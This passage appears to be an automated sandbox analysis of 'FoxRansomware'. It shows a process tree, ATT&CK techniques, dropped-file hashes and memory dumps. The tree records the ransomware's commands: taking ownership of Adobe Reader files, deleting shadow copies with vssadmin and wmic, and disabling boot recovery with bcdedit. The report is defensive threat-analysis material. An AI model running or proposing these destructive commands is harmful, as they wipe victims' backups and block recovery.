- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3584
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""
  2⤵
  PID:3576
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C
    3⤵
    PID:352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "CP1250.TXT" -nobanner
    3⤵
    PID:1956
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "CP1250.TXT" -nobanner
      4⤵
      PID:3756
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2760
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""
  2⤵
  PID:3664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "ended_review_or_form.gif" -nobanner
    3⤵
    PID:3780
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "ended_review_or_form.gif" -nobanner
      4⤵
      PID:704
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1356
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""
  2⤵
  PID:3784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "reviewers.gif" -nobanner
    3⤵
    PID:1508
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "reviewers.gif" -nobanner
      4⤵
      PID:108
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""
  2⤵
  PID:2200
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"
    3⤵
    - Modifies file permissions
    PID:2344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "server_lg.gif" -nobanner
    3⤵
    PID:1052
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "server_lg.gif" -nobanner
      4⤵
      PID:2032
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3500
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""
  2⤵
  PID:3504
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
    3⤵
    PID:2504
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
      4⤵
      PID:3204
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""
  2⤵
  PID:1424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:2160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"
    3⤵
    PID:3332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "MinionPro-Bold.otf" -nobanner
    3⤵
    PID:3428
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "MinionPro-Bold.otf" -nobanner
      4⤵
      PID:816
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""
  2⤵
  PID:1740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "zy______.pfm" -nobanner
    3⤵
    PID:3276
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "zy______.pfm" -nobanner
      4⤵
      PID:2952
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3460
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""
  2⤵
  PID:3176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C
    3⤵
    PID:3168
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"
    3⤵
    PID:3360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "brt.fca" -nobanner
    3⤵
    PID:2976
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "brt.fca" -nobanner
      4⤵
      PID:212

C:\Windows\system32\taskeng.exe
taskeng.exe {B9B13BA1-04FE-407F-8886-31DEBA806FED} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:Interactive:[1]
1⤵
PID:3904
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\LztNhVrL.bat"
  2⤵
  PID:3652
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:4228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1700
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1792
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3688
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:4052

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\Application\#FOX_README#.rtf

Filesize
8KB

MD5
619a9132432651604533dd7c41b87a5c

SHA1
f359d2e72026a58164a50a36855f1daa10d1ed0a

SHA256
e6fb6ed40759fd5126c8b04fdc340ed1c651e952f904a7a23f3d5ddfb2343622

SHA512
a62fc80018ff5607a618a10a7632fd4ede1a42094216f53164d366a7b7b2ece3e142978968beaaf1f36dd39f089afc6ddf363809f1cef84ce59f02eed5aaa8a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat

Filesize
226B

MD5
5ddfd1d9f9c7238ebb0ea7b2ddc3af86

SHA1
f9d4c36715c3e65bf2957defd130085fa5b61383

SHA256
f6f961f8cae1ad99be45e5010799202a1904799061dd05c5c1223117c48f350c

SHA512
b05cbaf190ead8b1d483fa897c51893532882bfb2152720fe4cb4d38d8db0df7bac2770e1e6901c8a6b8cb0c3610217e5e5f749fc240bc7c9b052f105c201e48

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\IxFf0Wdb.txt

Filesize
16B

MD5
17d432845dc7cb55ac69d75cf72f7f5d

SHA1
7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3

SHA256
a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4

SHA512
25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWK46EMN.exe

Filesize
1.2MB

MD5
268360527625d09e747d9f7ab1f84da5

SHA1
09772eb89c9743d3a6d7b2709c76e9740aa4c4b1

SHA256
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620

SHA512
07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_471D5351CE96D8D5.txt

Filesize
2KB

MD5
7116b296dbcea43529207557e85f2996

SHA1
7df343bc01252cb0c429dafa025328ef55dc3bb8

SHA256
8b6fdc9046ff057e1077067fa27e16ea6707203278295c940a27b1b5c657704e

SHA512
4c1f720dbaeea7d40c1b7ce762593284d112517852257dab20836b1374a1fed57b69d955e91b7179ce33e7058528d9f0aba63e2f6d89cc6eff35f9b5e39c2ab2

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_471D5351CE96D8D5.txt

Filesize
2KB

MD5
a50b1f61097708f3767a9f3e92917030

SHA1
00f267306a89b228ed21fb6532600f04e318faf9

SHA256
8971bd835997be6fc802cf1b1f201f55a86d116531352a7c0e5cc7796c8c4b7f

SHA512
f58d917169ded9ee6d2e477b4bd26aa62c4eb6df498f2bbe11122e05e36611da104e6176cbaa78bf866f3ee15cda3bafd72a8c2f754f82da8ef458f7b5e3adad

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_471D5351CE96D8D5.txt

Filesize
24KB

MD5
e02800c2d2dd20974162cca5d88ad159

SHA1
d06e66b4d89ea75b6b78089b79ee7630cb02b859

SHA256
2dcc467f644f1127415551b6187317cf1e950cea19eace9f7f20a1957259a100

SHA512
2ca095e11ca00083a71b150e34ac685fec02557196acc2aed2e1cc34e22eab93fcfb89b3255bce0777362bfeaa4e4923b53078e299e322f4cd88e7244f8dfe2e

Download Submit
C:\Users\Admin\AppData\Roaming\Cj3neP5l.vbs

Filesize
260B

MD5
75542260e9679eafd96a48d86f005638

SHA1
024e22071db254ae42ead157d018418ad9fe8102

SHA256
6cff95cb389e9fb732a179a697d28c46317bcb4d0be01c98aec2abc5688140c4

SHA512
de4fbc8e1293e18397bc1270a835116a2a914b5c737350f11881e68c60ca4579e57e94fb912a1d0a2939c961f68e1f1cd0a1d45fced7c91f2d7f262076e9de6f

Download Submit
C:\Users\Admin\AppData\Roaming\LztNhVrL.bat

Filesize
265B

MD5
5fbb89cbc5d1bae44690cd990c5ee5ae

SHA1
d18388df3b3a7d7409e7a7d7e256fc2795dd21e0

SHA256
de2f242bb48fface9a00212240b0c4946cf37b9d79a48435f041308f6987dcef

SHA512
d30dd9d30dbd19f49bf40c132284f5bd1cef1dc874de569f0e34a51d2cee591c94613835f92dd434122bbdbe9dd5746f8ca39afea46c6c9e7f847fa04a5ae585

Download Submit
\Users\Admin\AppData\Local\Temp\95Y5ZjHg64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
memory/220-8118-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/272-8098-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/540-7865-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/664-8081-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/764-7914-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/764-7916-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/816-8102-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/816-8104-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/912-7921-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/964-8039-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1196-8050-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1472-12-0x00000000736F0000-0x0000000073C9B000-memory.dmp

Filesize
5.7MB

Download
memory/1472-13-0x00000000028F0000-0x0000000002930000-memory.dmp

Filesize
256KB

Download
memory/1472-15-0x00000000736F0000-0x0000000073C9B000-memory.dmp

Filesize
5.7MB

Download
memory/1472-11-0x00000000736F0000-0x0000000073C9B000-memory.dmp

Filesize
5.7MB

Download
memory/1472-14-0x00000000028F0000-0x0000000002930000-memory.dmp

Filesize
256KB

Download
memory/1508-8073-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1528-8028-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1560-8092-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1564-7869-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1568-8030-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1596-8111-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1620-7936-0x0000000002310000-0x0000000002387000-memory.dmp

Filesize
476KB

Download
memory/1628-7877-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1628-7878-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1676-8109-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1908-8051-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1928-7925-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1928-7955-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2032-8079-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2032-8080-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2060-8026-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2076-8136-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2080-7888-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2080-8117-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2084-7870-0x00000000001D0000-0x0000000000247000-memory.dmp

Filesize
476KB

Download
memory/2148-7969-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2200-8083-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2280-7905-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2280-7906-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2428-8087-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2428-8085-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2500-8-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/2556-8034-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2556-8035-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2568-8068-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2584-8032-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2624-8063-0x00000000002C0000-0x0000000000337000-memory.dmp

Filesize
476KB

Download
memory/2632-8128-0x0000000002310000-0x0000000002387000-memory.dmp

Filesize
476KB

Download
memory/2716-8046-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2752-8024-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2784-8036-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2876-8012-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2908-7863-0x0000000000400000-0x000000000053B000-memory.dmp

Filesize
1.2MB

Download
memory/2964-7886-0x00000000002B0000-0x0000000000327000-memory.dmp

Filesize
476KB

Download
memory/2980-8031-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2992-8072-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3004-8027-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3112-8095-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3112-8094-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3140-7866-0x0000000002340000-0x00000000023B7000-memory.dmp

Filesize
476KB

Download
memory/3164-7876-0x0000000000610000-0x0000000000687000-memory.dmp

Filesize
476KB

Download
memory/3164-8106-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3224-8100-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3228-7881-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3248-8114-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3248-8115-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3284-8132-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3352-8015-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3352-8016-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3396-7961-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3404-7938-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3424-7892-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3440-8130-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3448-7882-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3448-7883-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3608-8062-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3636-8067-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3704-8140-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3720-7934-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3748-8025-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3872-8019-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3880-8018-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3936-7891-0x0000000000530000-0x00000000005A7000-memory.dmp

Filesize
476KB

Download
memory/3936-2492-0x0000000000530000-0x00000000005A7000-memory.dmp

Filesize
476KB

Download
memory/3944-8084-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3944-8065-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4040-2573-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4040-7893-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4116-8138-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4124-7911-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4124-8134-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4168-7902-0x0000000000180000-0x00000000001F7000-memory.dmp

Filesize
476KB

Download
memory/4188-7901-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4244-7942-0x0000000000270000-0x00000000002E7000-memory.dmp

Filesize
476KB

Download
memory/4256-7943-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4256-7944-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4296-7981-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4312-7978-0x00000000002A0000-0x0000000000317000-memory.dmp

Filesize
476KB

Download
memory/4320-7977-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4344-7947-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4344-7982-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4436-7951-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4472-7999-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4500-7991-0x0000000000330000-0x00000000003A7000-memory.dmp

Filesize
476KB

Download
memory/4504-7990-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4640-7964-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4684-7988-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4804-7986-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4820-7973-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4856-8021-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4892-7954-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4900-8022-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4952-8014-0x0000000000230000-0x00000000002A7000-memory.dmp

Filesize
476KB

Download
memory/4992-8001-0x0000000000240000-0x00000000002B7000-memory.dmp

Filesize
476KB

Download
memory/4996-8002-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5016-8003-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5016-8004-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5064-8006-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5064-8007-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5100-8010-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download